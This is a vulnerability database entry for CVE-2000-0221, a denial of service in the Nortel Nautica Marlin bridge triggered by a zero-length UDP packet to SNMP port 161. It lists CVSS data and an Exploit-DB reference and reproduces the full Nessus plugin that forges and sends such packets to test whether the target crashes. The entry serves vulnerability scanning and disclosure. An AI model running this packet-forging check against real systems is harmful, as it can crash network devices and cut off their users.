Vulnerabilities > CVE-2000-0221 - Unspecified vulnerability in Nortel Nautica Marlin

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
nortel
nessus
exploit available

Summary

The Nautica Marlin bridge allows remote attackers to cause a denial of service via a zero length UDP packet to the SNMP port.

Vulnerable Configurations

Part Description Count
Hardware
Nortel
1

Exploit-Db

descriptionNortel Networks Nautica Marlin Denial of Service Vulnerablility. CVE-2000-0221. Dos exploit for hardware platform
idEDB-ID:19766
last seen2016-02-02
modified2000-02-25
published2000-02-25
reporterChristophe GRENIER
sourcehttps://www.exploit-db.com/download/19766/
titleNortel Networks Nautica Marlin Denial of Service Vulnerablility

Nessus

NASL familySNMP
NASL idSNMP_DOS.NASL
descriptionIt was possible to crash either the remote host or the firewall in between us and the remote host by sending an UDP packet of null size going to port 161 (snmp) This flaw may allow an attacker to shut down your network.
last seen2020-06-01
modified2020-06-02
plugin id10266
published2000-02-24
reporterThis script is Copyright (C) 2000-2019 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10266
titleSNMP Zero Length UDP Packet Remote DoS
code
#
# (C) Tenable Network Security, Inc.
#

# Thanks to Christophe Grenier <[email protected]> for pointing this out
#

include("compat.inc");

if (description)
{
  script_id(10266);
  script_version("1.25");
  script_cvs_date("Date: 2019/03/06 18:38:55");

  script_cve_id("CVE-2000-0221");
  script_bugtraq_id(1009);

  script_name(english:"SNMP Zero Length UDP Packet Remote DoS");
  script_summary(english:"Crashes the remote host by sending a null UDP packet");

  script_set_attribute(attribute:'synopsis', value:"The remote host is vulnerable to denial of service.");
  script_set_attribute(attribute:'description', value:
"It was possible to crash either the remote host or the firewall in
between us and the remote host by sending an UDP packet of null size
going to port 161 (snmp)

This flaw may allow an attacker to shut down your network.");
  script_set_attribute(attribute:'solution', value:
"Contact your firewall vendor if it was the firewall which crashed, or
filter incoming UDP traffic if the remote host crashed.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2000/02/25");
  script_set_attribute(attribute:"plugin_publication_date", value:"2000/02/24");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_KILL_HOST);
  script_copyright(english:"This script is Copyright (C) 2000-2019 Tenable Network Security, Inc.");
  script_family(english:"SNMP");

  script_require_keys("Settings/ParanoidReport");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

if ( TARGET_IS_IPV6 ) exit(0);

start_denial();


ip = forge_ip_packet(ip_v   : 4,
		     ip_hl  : 5,
		     ip_tos : 0,
		     ip_id  : 0x4321,
		     ip_len : 28,
		     ip_off : 0,
		     ip_p   : IPPROTO_UDP,
		     ip_src : compat::this_host(),
		     ip_ttl : 0x40);

# Forge the UDP packet

udp = forge_udp_packet( ip : ip,
			uh_sport : 1234, uh_dport : 161,
			uh_ulen : 8);


#
# Send this packet 10 times
#

send_packet(udp, pcap_active:FALSE) x 10;

#
# wait
#
sleep(5);

#
# And check...
#
alive = end_denial();
if(!alive)
{
  set_kb_item(name:"Host/dead", value:TRUE);
  security_warning(port:161, proto:"udp");
}